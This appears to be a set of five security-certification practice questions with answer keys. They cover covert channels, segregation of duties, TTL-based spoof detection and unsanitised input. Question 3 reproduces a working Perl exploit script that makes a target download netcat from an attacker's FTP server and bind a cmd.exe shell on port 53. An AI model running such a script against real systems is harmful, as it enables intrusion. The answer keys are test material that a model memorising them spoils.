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QUESTION 1

Which definition below best describes a covert channel?

- A. A server program using a port that is not well known
- B. Making use of a protocol in a way it was not intended to be used
- C. It is the multiplexing taking place on a communication link
- D. It is one of the weak channels used by WEP that makes it insecure

Correct Answer: B

QUESTION 2

A Network Administrator was recently promoted to Chief Security Officer at a local university. One of employee's new responsibilities is to manage the implementation of an RFID card access system to a new server room on campus. The server room will house student enrollment information that is securely backed up to an off-site location.

During a meeting with an outside consultant, the Chief Security Officer explains that he is concerned that the existing security controls have not been designed properly. Currently, the Network Administrator is responsible for approving and issuing RFID card access to the server room, as well as reviewing the electronic access logs on a weekly basis.

Which of the following is an issue with the situation?

- A. Segregation of duties
- B. Undue influence
- C. Lack of experience
- D. Inadequate disaster recovery plan

Correct Answer: A

QUESTION 3

What is the expected result of the following exploit?



```
#####
#####
$port = 53; # Spawn cmd.exe on port X
$your = "192.168.1.1"; # Your FTP Server
$user = "Anonymous"; # login as
$pass = 'noone@nowhere.com'; # password
#####
$host = $ARGV[0];
print "Starting ... \n";
print "Server will download the file nc.exe from $your FTP server. \n";
system("perl msadc.pl -h $host -C \"echo open $your >> sasfile\"");
system("perl msadc.pl -h $host -C \"echo $user >> sasfile\"");
system("perl msadc.pl -h $host -C \"echo $pass >> sasfile\"");
system("perl msadc.pl -h $host -C \"echo hacked.html >> sasfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe >> sasfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html >> sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit >> sasfile\"");
print "Server is downloading ... \n";
system("perl msadc.pl -h $host -C \"ftp -s: sasfile\"");
print "Press ENTER when download is finished ... (That's why it's good to have your own ftp server) \n";
$o=<STDIN>; print "Opening ... \n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
print "Done. \n";
#system("telnet $host $port"); exit(0);
```

- A. Opens up a telnet listener that requires no username or password.
- B. Create a FTP server with write permissions enabled.
- C. Creates a share called "sasfile" on the target system.
- D. Creates an account with a user name of Anonymous and a password of noone@nowhere.com.

Correct Answer: A

QUESTION 4

Wayne is the senior security analyst for his company. Wayne is examining some traffic logs on a server and came across some inconsistencies. Wayne finds some IP packets from a computer purporting to be on the internal network. The packets originate from 192.168.12.35 with a TTL of 15. The server replied to this computer and received a response from 192.168.12.35 with a TTL of 21. What can Wayne infer from this traffic log?

- A. The initial traffic from 192.168.12.35 was being spoofed.
- B. The traffic from 192.168.12.25 is from a Linux computer.
- C. The TTL of 21 means that the client computer is on wireless.



D. The client computer at 192.168.12.35 is a zombie computer.

Correct Answer: A

QUESTION 5

Liza has forgotten her password to an online bookstore. The web application asks her to key in her email so that they can send her the password. Liza enters her email liza@yahoo.com\\. The application displays server error. What is wrong with the web application?

- A. The email is not valid
- B. User input is not sanitized
- C. The web server may be down
- D. The ISP connection is not reliable

Correct Answer: B

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